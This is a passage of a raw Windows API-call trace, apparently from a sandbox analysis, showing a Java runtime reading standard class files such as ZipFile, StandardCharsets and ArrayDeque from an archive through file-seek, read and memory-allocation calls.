lpNumberOfBytesRead=0x208d8c0, lpOverlapped=0x0 | out: lpBuffer=0x1225e210*, lpNumberOfBytesRead=0x208d8c0*=0x2674, lpOverlapped=0x0) returned 1 [0101.384] malloc (_Size=0x48) returned 0x1228f090 [0101.384] malloc (_Size=0xa0) returned 0x12296550 [0101.384] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418a3d, lpNewFilePointer=0x208d1d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1d0*=54626877) returned 1 [0101.384] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d1a0, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208d1a0*=0xa0, lpOverlapped=0x0) returned 1 [0101.385] malloc (_Size=0x21) returned 0x12221e10 [0101.385] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31088da, lpNewFilePointer=0x208cdd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cdd0*=51415258) returned 1 [0101.385] ReadFile (in: hFile=0x134, lpBuffer=0x208ce20, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cda0, lpOverlapped=0x0 | out: lpBuffer=0x208ce20*, lpNumberOfBytesRead=0x208cda0*=0x1e, lpOverlapped=0x0) returned 1 [0101.386] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3108918, lpNewFilePointer=0x208ce30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ce30*=51415320) returned 1 [0101.386] ReadFile (in: hFile=0x134, lpBuffer=0x12260a30, nNumberOfBytesToRead=0x4d6, lpNumberOfBytesRead=0x208ce00, lpOverlapped=0x0 | out: lpBuffer=0x12260a30*, lpNumberOfBytesRead=0x208ce00*=0x4d6, lpOverlapped=0x0) returned 1 [0101.390] strlen (_Str="java/util/zip/ZipFile$1.class") returned 0x1d [0101.390] malloc (_Size=0x48) returned 0x1228e960 [0101.390] malloc (_Size=0xa0) returned 0x12296550 [0101.390] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34189f2, lpNewFilePointer=0x208df40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df40*=54626802) returned 1 [0101.390] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df10, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208df10*=0xa0, lpOverlapped=0x0) returned 1 [0101.391] malloc (_Size=0x1e) returned 0x12222020 [0101.391] strlen (_Str="java/util/zip/ZipFile$1.class") returned 0x1d [0101.391] strcpy (in: _Dest=0x208e0c0, _Source="java/util/zip/ZipFile$1.class" | out: _Dest="java/util/zip/ZipFile$1.class") returned="java/util/zip/ZipFile$1.class" [0101.391] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310872f, lpNewFilePointer=0x208db40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db40*=51414831) returned 1 [0101.391] ReadFile (in: hFile=0x134, lpBuffer=0x208db90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db10, lpOverlapped=0x0 | out: lpBuffer=0x208db90*, lpNumberOfBytesRead=0x208db10*=0x1e, lpOverlapped=0x0) returned 1 [0101.392] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310876a, lpNewFilePointer=0x208dba0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dba0*=51414890) returned 1 [0101.392] ReadFile (in: hFile=0x134, lpBuffer=0x20fe980, nNumberOfBytesToRead=0x170, lpNumberOfBytesRead=0x208db70, lpOverlapped=0x0 | out: lpBuffer=0x20fe980*, lpNumberOfBytesRead=0x208db70*=0x170, lpOverlapped=0x0) returned 1 [0101.393] free (_Block=0x12221e10) [0101.393] free (_Block=0x1228f090) [0101.394] strlen (_Str="sun/misc/JavaUtilZipFileAccess.class") returned 0x24 [0101.394] malloc (_Size=0x48) returned 0x1228e140 [0101.394] malloc (_Size=0xa0) returned 0x12296550 [0101.394] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34189a0, lpNewFilePointer=0x208d480, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d480*=54626720) returned 1 [0101.394] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d450, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208d450*=0xa0, lpOverlapped=0x0) returned 1 [0101.395] malloc (_Size=0x25) returned 0x12221f00 [0101.395] strlen (_Str="sun/misc/JavaUtilZipFileAccess.class") returned 0x24 [0101.395] strcpy (in: _Dest=0x208d600, _Source="sun/misc/JavaUtilZipFileAccess.class" | out: _Dest="sun/misc/JavaUtilZipFileAccess.class") returned="sun/misc/JavaUtilZipFileAccess.class" [0101.395] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3108660, lpNewFilePointer=0x208d080, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d080*=51414624) returned 1 [0101.396] ReadFile (in: hFile=0x134, lpBuffer=0x208d0d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d050, lpOverlapped=0x0 | out: lpBuffer=0x208d0d0*, lpNumberOfBytesRead=0x208d050*=0x1e, lpOverlapped=0x0) returned 1 [0101.396] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31086a2, lpNewFilePointer=0x208d0e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d0e0*=51414690) returned 1 [0101.396] ReadFile (in: hFile=0x134, lpBuffer=0x1225bac0, nNumberOfBytesToRead=0x8d, lpNumberOfBytesRead=0x208d0b0, lpOverlapped=0x0 | out: lpBuffer=0x1225bac0*, lpNumberOfBytesRead=0x208d0b0*=0x8d, lpOverlapped=0x0) returned 1 [0101.397] free (_Block=0x12222020) [0101.397] free (_Block=0x1228e960) [0101.404] strlen (_Str="java/util/jar/JavaUtilJarAccessImpl.class") returned 0x29 [0101.404] malloc (_Size=0x48) returned 0x1228e5a0 [0101.404] malloc (_Size=0xa0) returned 0x12296550 [0101.404] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418861, lpNewFilePointer=0x208e0c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0c0*=54626401) returned 1 [0101.404] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e090, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208e090*=0xa0, lpOverlapped=0x0) returned 1 [0101.405] malloc (_Size=0x2a) returned 0x122219a0 [0101.405] strlen (_Str="java/util/jar/JavaUtilJarAccessImpl.class") returned 0x29 [0101.405] strcpy (in: _Dest=0x208e240, _Source="java/util/jar/JavaUtilJarAccessImpl.class" | out: _Dest="java/util/jar/JavaUtilJarAccessImpl.class") returned="java/util/jar/JavaUtilJarAccessImpl.class" [0101.405] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3104996, lpNewFilePointer=0x208dcc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcc0*=51399062) returned 1 [0101.406] ReadFile (in: hFile=0x134, lpBuffer=0x208dd10, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dc90, lpOverlapped=0x0 | out: lpBuffer=0x208dd10*, lpNumberOfBytesRead=0x208dc90*=0x1e, lpOverlapped=0x0) returned 1 [0101.407] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31049dd, lpNewFilePointer=0x208dd20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dd20*=51399133) returned 1 [0101.407] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x639, lpNumberOfBytesRead=0x208dcf0, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208dcf0*=0x639, lpOverlapped=0x0) returned 1 [0101.408] free (_Block=0x12221f00) [0101.408] free (_Block=0x1228e140) [0101.410] strlen (_Str="sun/misc/JavaUtilJarAccess.class") returned 0x20 [0101.410] malloc (_Size=0x48) returned 0x1228ec30 [0101.410] malloc (_Size=0xa0) returned 0x12296550 [0101.410] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418813, lpNewFilePointer=0x208d600, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d600*=54626323) returned 1 [0101.410] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d5d0, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208d5d0*=0xa0, lpOverlapped=0x0) returned 1 [0101.411] malloc (_Size=0x21) returned 0x12222020 [0101.411] strlen (_Str="sun/misc/JavaUtilJarAccess.class") returned 0x20 [0101.411] strcpy (in: _Dest=0x208d780, _Source="sun/misc/JavaUtilJarAccess.class" | out: _Dest="sun/misc/JavaUtilJarAccess.class") returned="sun/misc/JavaUtilJarAccess.class" [0101.411] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310458a, lpNewFilePointer=0x208d200, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d200*=51398026) returned 1 [0101.411] ReadFile (in: hFile=0x134, lpBuffer=0x208d250, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d1d0, lpOverlapped=0x0 | out: lpBuffer=0x208d250*, lpNumberOfBytesRead=0x208d1d0*=0x1e, lpOverlapped=0x0) returned 1 [0101.412] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31045c8, lpNewFilePointer=0x208d260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d260*=51398088) returned 1 [0101.412] ReadFile (in: hFile=0x134, lpBuffer=0x1225c150, nNumberOfBytesToRead=0x3ce, lpNumberOfBytesRead=0x208d230, lpOverlapped=0x0 | out: lpBuffer=0x1225c150*, lpNumberOfBytesRead=0x208d230*=0x3ce, lpOverlapped=0x0) returned 1 [0101.412] free (_Block=0x122219a0) [0101.412] free (_Block=0x1228e5a0) [0101.428] strlen (_Str="java/nio/charset/StandardCharsets.class") returned 0x27 [0101.428] malloc (_Size=0x48) returned 0x1228edc0 [0101.428] malloc (_Size=0xa0) returned 0x12296550 [0101.428] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34187be, lpNewFilePointer=0x208e440, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e440*=54626238) returned 1 [0101.428] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e410, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208e410*=0xa0, lpOverlapped=0x0) returned 1 [0101.429] malloc (_Size=0x28) returned 0x12221e10 [0101.430] strlen (_Str="java/nio/charset/StandardCharsets.class") returned 0x27 [0101.430] strcpy (in: _Dest=0x208e5c0, _Source="java/nio/charset/StandardCharsets.class" | out: _Dest="java/nio/charset/StandardCharsets.class") returned="java/nio/charset/StandardCharsets.class" [0101.432] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3104259, lpNewFilePointer=0x208e040, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e040*=51397209) returned 1 [0101.432] ReadFile (in: hFile=0x134, lpBuffer=0x208e090, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e010, lpOverlapped=0x0 | out: lpBuffer=0x208e090*, lpNumberOfBytesRead=0x208e010*=0x1e, lpOverlapped=0x0) returned 1 [0101.433] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310429e, lpNewFilePointer=0x208e0a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e0a0*=51397278) returned 1 [0101.433] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x2ec, lpNumberOfBytesRead=0x208e070, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e070*=0x2ec, lpOverlapped=0x0) returned 1 [0101.433] free (_Block=0x12222020) [0101.434] free (_Block=0x1228ec30) [0101.439] strlen (_Str="sun/nio/cs/US_ASCII.class") returned 0x19 [0101.440] malloc (_Size=0x48) returned 0x1228eaf0 [0101.440] malloc (_Size=0xa0) returned 0x12296550 [0101.440] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418777, lpNewFilePointer=0x208da30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da30*=54626167) returned 1 [0101.440] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da00, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208da00*=0xa0, lpOverlapped=0x0) returned 1 [0101.441] malloc (_Size=0x1a) returned 0x12221ea0 [0101.441] strlen (_Str="sun/nio/cs/US_ASCII.class") returned 0x19 [0101.441] strcpy (in: _Dest=0x208dbb0, _Source="sun/nio/cs/US_ASCII.class" | out: _Dest="sun/nio/cs/US_ASCII.class") returned="sun/nio/cs/US_ASCII.class" [0101.441] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3103ea9, lpNewFilePointer=0x208d630, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d630*=51396265) returned 1 [0101.442] ReadFile (in: hFile=0x134, lpBuffer=0x208d680, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d600, lpOverlapped=0x0 | out: lpBuffer=0x208d680*, lpNumberOfBytesRead=0x208d600*=0x1e, lpOverlapped=0x0) returned 1 [0101.445] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3103ee0, lpNewFilePointer=0x208d690, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d690*=51396320) returned 1 [0101.445] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x379, lpNumberOfBytesRead=0x208d660, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208d660*=0x379, lpOverlapped=0x0) returned 1 [0101.445] free (_Block=0x12221e10) [0101.446] free (_Block=0x1228edc0) [0101.448] strlen (_Str="sun/nio/cs/ISO_8859_1") returned 0x15 [0101.449] malloc (_Size=0x48) returned 0x1228e230 [0101.449] malloc (_Size=0xa0) returned 0x12296550 [0101.449] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341872e, lpNewFilePointer=0x208df50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df50*=54626094) returned 1 [0101.449] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df20, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208df20*=0xa0, lpOverlapped=0x0) returned 1 [0101.450] malloc (_Size=0x1c) returned 0x12221e10 [0101.450] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3103aa1, lpNewFilePointer=0x208db50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db50*=51395233) returned 1 [0101.450] ReadFile (in: hFile=0x134, lpBuffer=0x208dba0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db20, lpOverlapped=0x0 | out: lpBuffer=0x208dba0*, lpNumberOfBytesRead=0x208db20*=0x1e, lpOverlapped=0x0) returned 1 [0101.451] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3103ada, lpNewFilePointer=0x208dbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbb0*=51395290) returned 1 [0101.451] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x3cf, lpNumberOfBytesRead=0x208db80, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208db80*=0x3cf, lpOverlapped=0x0) returned 1 [0101.457] strlen (_Str="sun/nio/cs/UTF_16BE") returned 0x13 [0101.457] strlen (_Str="sun/nio/cs/UTF_16BE.class") returned 0x19 [0101.457] malloc (_Size=0x48) returned 0x1228e3c0 [0101.457] malloc (_Size=0xa0) returned 0x12296550 [0101.457] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34186e7, lpNewFilePointer=0x208df50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df50*=54626023) returned 1 [0101.457] ReadFile (in: hFile=0x134, lpBuffer=0x12296550, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df20, lpOverlapped=0x0 | out: lpBuffer=0x12296550*, lpNumberOfBytesRead=0x208df20*=0xa0, lpOverlapped=0x0) returned 1 [0101.458] malloc (_Size=0x1a) returned 0x12221ea0 [0101.458] strlen (_Str="sun/nio/cs/UTF_16BE.class") returned 0x19 [0101.458] strcpy (in: _Dest=0x208e0d0, _Source="sun/nio/cs/UTF_16BE.class" | out: _Dest="sun/nio/cs/UTF_16BE.class") returned="sun/nio/cs/UTF_16BE.class" [0101.459] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310379b, lpNewFilePointer=0x208db50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db50*=51394459) returned 1 [0101.459] ReadFile (in: hFile=0x134, lpBuffer=0x208dba0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db20, lpOverlapped=0x0 | out: lpBuffer=0x208dba0*, lpNumberOfBytesRead=0x208db20*=0x1e, lpOverlapped=0x0) returned 1 [0101.459] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31037d2, lpNewFilePointer=0x208dbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbb0*=51394514) returned 1 [0101.460] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x2cf, lpNumberOfBytesRead=0x208db80, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208db80*=0x2cf, lpOverlapped=0x0) returned 1 [0101.460] free (_Block=0x12221e10) [0101.460] free (_Block=0x1228e230) [0101.468] strlen (_Str="sun/nio/cs/UTF_16LE") returned 0x13 [0101.469] strlen (_Str="sun/nio/cs/UTF_16LE.class") returned 0x19 [0101.469] malloc (_Size=0x48) returned 0x1228ecd0 [0101.469] malloc (_Size=0xa0) returned 0x122965e0 [0101.469] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34186a0, lpNewFilePointer=0x208df50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df50*=54625952) returned 1 [0101.469] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df20, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208df20*=0xa0, lpOverlapped=0x0) returned 1 [0101.470] malloc (_Size=0x1a) returned 0x12221e10 [0101.470] strlen (_Str="sun/nio/cs/UTF_16LE.class") returned 0x19 [0101.470] strcpy (in: _Dest=0x208e0d0, _Source="sun/nio/cs/UTF_16LE.class" | out: _Dest="sun/nio/cs/UTF_16LE.class") returned="sun/nio/cs/UTF_16LE.class" [0101.470] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3103492, lpNewFilePointer=0x208db50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db50*=51393682) returned 1 [0101.471] ReadFile (in: hFile=0x134, lpBuffer=0x208dba0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db20, lpOverlapped=0x0 | out: lpBuffer=0x208dba0*, lpNumberOfBytesRead=0x208db20*=0x1e, lpOverlapped=0x0) returned 1 [0101.472] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31034c9, lpNewFilePointer=0x208dbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbb0*=51393737) returned 1 [0101.472] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x2d2, lpNumberOfBytesRead=0x208db80, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208db80*=0x2d2, lpOverlapped=0x0) returned 1 [0101.472] free (_Block=0x12221ea0) [0101.473] free (_Block=0x1228e3c0) [0101.482] strlen (_Str="sun/nio/cs/UTF_16") returned 0x11 [0101.487] strlen (_Str="sun/nio/cs/UTF_16.class") returned 0x17 [0101.488] malloc (_Size=0x48) returned 0x1228ec80 [0101.488] malloc (_Size=0xa0) returned 0x122965e0 [0101.488] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341865b, lpNewFilePointer=0x208df50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208df50*=54625883) returned 1 [0101.488] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208df20, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208df20*=0xa0, lpOverlapped=0x0) returned 1 [0101.490] malloc (_Size=0x18) returned 0x122933d0 [0101.490] strlen (_Str="sun/nio/cs/UTF_16.class") returned 0x17 [0101.490] strcpy (in: _Dest=0x208e0d0, _Source="sun/nio/cs/UTF_16.class" | out: _Dest="sun/nio/cs/UTF_16.class") returned="sun/nio/cs/UTF_16.class" [0101.490] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31031b0, lpNewFilePointer=0x208db50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208db50*=51392944) returned 1 [0101.490] ReadFile (in: hFile=0x134, lpBuffer=0x208dba0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208db20, lpOverlapped=0x0 | out: lpBuffer=0x208dba0*, lpNumberOfBytesRead=0x208db20*=0x1e, lpOverlapped=0x0) returned 1 [0101.491] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31031e5, lpNewFilePointer=0x208dbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dbb0*=51392997) returned 1 [0101.491] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x2ad, lpNumberOfBytesRead=0x208db80, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208db80*=0x2ad, lpOverlapped=0x0) returned 1 [0101.493] free (_Block=0x12221e10) [0101.493] free (_Block=0x1228ecd0) [0101.517] strlen (_Str="java/util/ArrayDeque.class") returned 0x1a [0101.517] malloc (_Size=0x48) returned 0x1228e870 [0101.517] malloc (_Size=0xa0) returned 0x122965e0 [0101.517] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418613, lpNewFilePointer=0x208e500, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e500*=54625811) returned 1 [0101.517] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e4d0, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208e4d0*=0xa0, lpOverlapped=0x0) returned 1 [0101.518] malloc (_Size=0x1b) returned 0x12221ba0 [0101.518] strlen (_Str="java/util/ArrayDeque.class") returned 0x1a [0101.518] strcpy (in: _Dest=0x208e680, _Source="java/util/ArrayDeque.class" | out: _Dest="java/util/ArrayDeque.class") returned="java/util/ArrayDeque.class" [0101.518] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3101686, lpNewFilePointer=0x208e100, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e100*=51385990) returned 1 [0101.518] ReadFile (in: hFile=0x134, lpBuffer=0x208e150, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208e0d0, lpOverlapped=0x0 | out: lpBuffer=0x208e150*, lpNumberOfBytesRead=0x208e0d0*=0x1e, lpOverlapped=0x0) returned 1 [0101.520] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31016be, lpNewFilePointer=0x208e160, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e160*=51386046) returned 1 [0101.521] ReadFile (in: hFile=0x134, lpBuffer=0x1225b970, nNumberOfBytesToRead=0x1af2, lpNumberOfBytesRead=0x208e130, lpOverlapped=0x0 | out: lpBuffer=0x1225b970*, lpNumberOfBytesRead=0x208e130*=0x1af2, lpOverlapped=0x0) returned 1 [0101.522] free (_Block=0x122933d0) [0101.522] free (_Block=0x1228ec80) [0101.525] strlen (_Str="java/util/Deque.class") returned 0x15 [0101.525] malloc (_Size=0x48) returned 0x1228ec80 [0101.525] malloc (_Size=0xa0) returned 0x122965e0 [0101.525] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34185d0, lpNewFilePointer=0x208da40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208da40*=54625744) returned 1 [0101.525] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208da10, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208da10*=0xa0, lpOverlapped=0x0) returned 1 [0101.526] malloc (_Size=0x16) returned 0x122933d0 [0101.527] strlen (_Str="java/util/Deque.class") returned 0x15 [0101.527] strcpy (in: _Dest=0x208dbc0, _Source="java/util/Deque.class" | out: _Dest="java/util/Deque.class") returned="java/util/Deque.class" [0101.527] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3101255, lpNewFilePointer=0x208d640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d640*=51384917) returned 1 [0101.527] ReadFile (in: hFile=0x134, lpBuffer=0x208d690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d610, lpOverlapped=0x0 | out: lpBuffer=0x208d690*, lpNumberOfBytesRead=0x208d610*=0x1e, lpOverlapped=0x0) returned 1 [0101.528] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3101288, lpNewFilePointer=0x208d6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d6a0*=51384968) returned 1 [0101.528] ReadFile (in: hFile=0x134, lpBuffer=0x1225d5e0, nNumberOfBytesToRead=0x3fe, lpNumberOfBytesRead=0x208d670, lpOverlapped=0x0 | out: lpBuffer=0x1225d5e0*, lpNumberOfBytesRead=0x208d670*=0x3fe, lpOverlapped=0x0) returned 1 [0101.528] free (_Block=0x12221ba0) [0101.529] free (_Block=0x1228e870) [0101.532] strlen (_Str="java/util/Queue.class") returned 0x15 [0101.532] malloc (_Size=0x48) returned 0x1228e230 [0101.532] malloc (_Size=0xa0) returned 0x122965e0 [0101.532] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341858d, lpNewFilePointer=0x208cf80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cf80*=54625677) returned 1 [0101.532] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cf50, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208cf50*=0xa0, lpOverlapped=0x0) returned 1 [0101.533] malloc (_Size=0x16) returned 0x12292f30 [0101.533] strlen (_Str="java/util/Queue.class") returned 0x15 [0101.533] strcpy (in: _Dest=0x208d100, _Source="java/util/Queue.class" | out: _Dest="java/util/Queue.class") returned="java/util/Queue.class" [0101.533] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x310109a, lpNewFilePointer=0x208cb80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cb80*=51384474) returned 1 [0101.533] ReadFile (in: hFile=0x134, lpBuffer=0x208cbd0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208cb50, lpOverlapped=0x0 | out: lpBuffer=0x208cbd0*, lpNumberOfBytesRead=0x208cb50*=0x1e, lpOverlapped=0x0) returned 1 [0101.535] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x31010cd, lpNewFilePointer=0x208cbe0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbe0*=51384525) returned 1 [0101.535] ReadFile (in: hFile=0x134, lpBuffer=0x1225db50, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x208cbb0, lpOverlapped=0x0 | out: lpBuffer=0x1225db50*, lpNumberOfBytesRead=0x208cbb0*=0x188, lpOverlapped=0x0) returned 1 [0101.535] free (_Block=0x122933d0) [0101.535] free (_Block=0x1228ec80) [0101.562] malloc (_Size=0x48) returned 0x1228eb40 [0101.562] malloc (_Size=0xa0) returned 0x122965e0 [0101.562] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3418543, lpNewFilePointer=0x208e240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e240*=54625603) returned 1 [0101.562] ReadFile (in: hFile=0x134, lpBuffer=0x122965e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e210, lpOverlapped=0x0 | out: lpBuffer=0x122965e0*, lpNumberOfBytesRead=0x208e210*=0xa0, lpOverlapped=0x0) returned 1 [0101.563] malloc (_Size=0x1d) returned 0x12221e10 [0101.563] strlen (_Str="java/util/zip/ZipCoder.class") returned 0x1c [0101.564] strcpy (in: _Dest=0x208e3c0, _Source="java/util/zip/ZipCoder.class" | out: _Dest="java/util/zip/ZipCoder.class") returned="java/util/zip/ZipCoder.class" [0101.564] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3100320, lpNewFilePointer=0x208de40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208de40*=51381024) returned 1 [0101.564] ReadFile (in: hFile=0x134, lpBuffer=0x208de90, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208de10, lpOverlapped=0x0 | out: lpBuffer=0x208de90*, lpNumberOfBytesRead=0x208de10*=0x1e, lpOverlapped=0x0) returned 1 